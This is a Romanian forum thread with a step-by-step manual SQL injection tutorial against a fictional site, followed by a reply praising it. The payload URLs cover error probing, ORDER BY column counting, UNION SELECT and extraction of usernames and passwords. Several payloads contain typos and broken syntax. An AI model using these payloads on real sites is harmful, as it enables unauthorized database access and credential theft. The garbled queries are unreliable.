Jump to content
mDOS

SQL Injection-Manual

Recommended Posts

Posted

Sa zicem ca aveti un site din programul "Big Bounty" si vreti sa incercati un atac MYSQL.

Eu am sa pun urmatorul site fictional:

https://victimescu.com/index.php?id=5

 

Pentru a verifica daca site-ul nostru da o eroare Sql trebuie sa punem dupa parametrul .php?.id=5 semnul (').

 

Daca acesta este vulnerabil va scrie urmatoarea chestie:

You have an error in your SQL syntax; check the manual that corresponds to your….. Continued

Daca acesta nu este vulnerabil, site-ul nostru va functiona normal.

 

In continuare trebuie sa mergem cu parametrul (ORDER BY ) ca in pasul de mai sus.

- Acesta este folosit pentru a verifica cate coloane se afla pe pagina respectiva in baza de date mySQL.

 

https://victimescu.com/index.php?id=5 ORDER BY 5 -

 

Daca pagina noastra functioneaza perfect normal inseamna ca sunt prezente mai mult de 5 coloane in baza de date.

Incercam sa marim numarul cu 10.

 

https://victimescu.com/index.php?id=1 ORDER BY 15-

 

Sa zicem ca acum ne va aparea eroarea care ne indica numarul de coloane prezente.

 

Unknown column ’10’ in ‘order clause’Unknown column ’10’ in ‘order clause’ 

 

Sa zicem ca pe site-ul nostru fictional avem prezente 9 coloane.

 

Acum continuam doar cu parametrul (UNION SELECT).

 

https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4,5,6,7,8,9

 

In continuare trebuie sa apara 2 numere care indica unde facem injectarea.

-------------------------------------------------

Un numar din cele 2 va fi boldit.

-------------------------------------------------

Sa zicem ca cele 2 numere sunt 5 si 3 iar cel care ne indica baza de date sau coloana unde trebuie facuta injectarea este 5.

 

 

https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact (table_name),6,7 from information_schema.tables

 

Aceasta comanda ne ajuta sa vedem ce se afla in aceasta baza de date.

 

CHARACTER_SETS,CLIENT_STATISTICS,COLUMNS

In continuare pentru a extrage mai multe chestii scriem urmatoarea comanda:

 

 

https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact (column_name),6,7 from information_schema.columns where table_schema=database()-

 

in continuare o sa ne apara:

-useri

-parole

-email-uri

-etc

 

https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact(username,0x3a,password),67 from database-

 

Aceasta comanda a fost folosita pentru a afla parola de la panel.

-------------------------------------------------

Deseori parola va fi in format MD5

-------------------------------------------------

 

Acesta a fost tutorialul si sper sa fie folosit in scopuri bune. :)

 

 

 

 

 

  • Upvote 2
Posted (edited)

Mamaaa, asta m-a invatat pe mine cineva (tot de aici insa nu mai retin nick-ul) acum 5-6 ani cred :-)) (era pe timpul cu rstcenter...)

Foarte bun tutorial.

 

O sa caut in pc-ul meu ca aveam ceva syntaxe cu sqli, si le postez tot aici.

 

Edited by n3Oh
  • Like 1
  • Thanks 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...